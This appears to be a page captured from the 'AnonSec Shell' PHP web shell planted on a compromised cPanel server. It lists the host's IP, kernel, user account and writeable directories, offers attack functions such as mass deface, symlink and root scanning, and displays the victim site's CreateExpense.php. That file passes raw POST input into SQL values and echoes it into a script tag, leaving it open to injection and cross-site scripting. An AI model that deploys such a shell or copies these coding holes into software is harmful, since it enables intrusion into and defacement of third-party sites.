AnonSec Shell
Server IP : 104.21.37.246  /  Your IP : 104.23.243.33   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home2/cp648411/public_html/ilawasia.onnud20.com/CaseList/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home2/cp648411/public_html/ilawasia.onnud20.com/CaseList/CreateExpense.php
<?php
$ck='not';
include("../include/checkLogin.php");
include("../include/class.php");
include("../include/table_name.php");
$date_year = date("Y");
$date_month = date("m");
/*
echo "<pre>";
print_r($_SESSION);
echo "</pre>";
echo "<pre>";
print_r($_FILES['File']);
echo "</pre>";
echo "<pre>";
print_r($_POST);
echo "</pre>";

exit();
*/
$expensedate = $util_class->date_chang_1($_POST["ExpenseDate"]);
//$ExpenseDetail = str_replace("'", "’", @$_POST["ExpenseDetail"]);
$ExpenseDetail = @$_POST["ExpenseDetail"];
$list = array(
  'table'=>$name_table6,
  'CaseId'=>"'".@$_POST["CaseId"]."'",
  'Category'=>"'".@$_POST["Category"]."'",
  'ExpenseDate'=>"'".@$expensedate."'",
  'ExpenseDetail'=>'"'.@$ExpenseDetail.'"',
  'ExpenseTotal'=>"'".@$_POST["ExpenseTotal"]."'",
  'ExpenseStatus'=>"'".@$_POST["ExpenseStatus"]."'",
  'IsExcludeVat'=>"'".@$_POST["IsExcludeVat"]."'",
  'Del'=>"0",
  'CreateBy'=>"'".@$_SESSION["UserInfo"][0]['UserId']."'",
  'CreateDateTime'=>"'".@$date."'"
);
$data = $actiondata_db->add_db($list);

if($data['suc']==1){
  $_SESSION['Success']='Add expense successful';
/*
  $sql = array('table'=>$name_table6,'count'=>'MAX(CaseId) AS max_id','where'=>"");
  $view_sql = $view_db->view($sql);
  $row = $view_db->q($view_sql);
  $CaseId = $row['max_id'];
  $CaseNumber = $_POST['CustomerCode'].'.'.$CaseTypeAbbr.'.'.$CountryCode.str_pad($CaseId,4,"0",STR_PAD_LEFT);

  $list = array(
    'table'=>'ct_invoice_item',
    'CaseId'=>$CaseId,
    'CaseNumber'=>$CaseNumber,
  );
  $data = $actiondata_db->edit_db($list);
*/

  echo "<script>window.location.href='edit.php?Type=Edit&Id=$_POST[CaseId]'; $('#nav-expense-tab').aria-selected(true)</script>";

}else{
  $_SESSION['Error']='false';
  echo "<script>window.location.href='edit.php?Type=Edit&Id=$_POST[CaseId]'</script>";

}


?>

Anon7 - 2022
AnonSec Team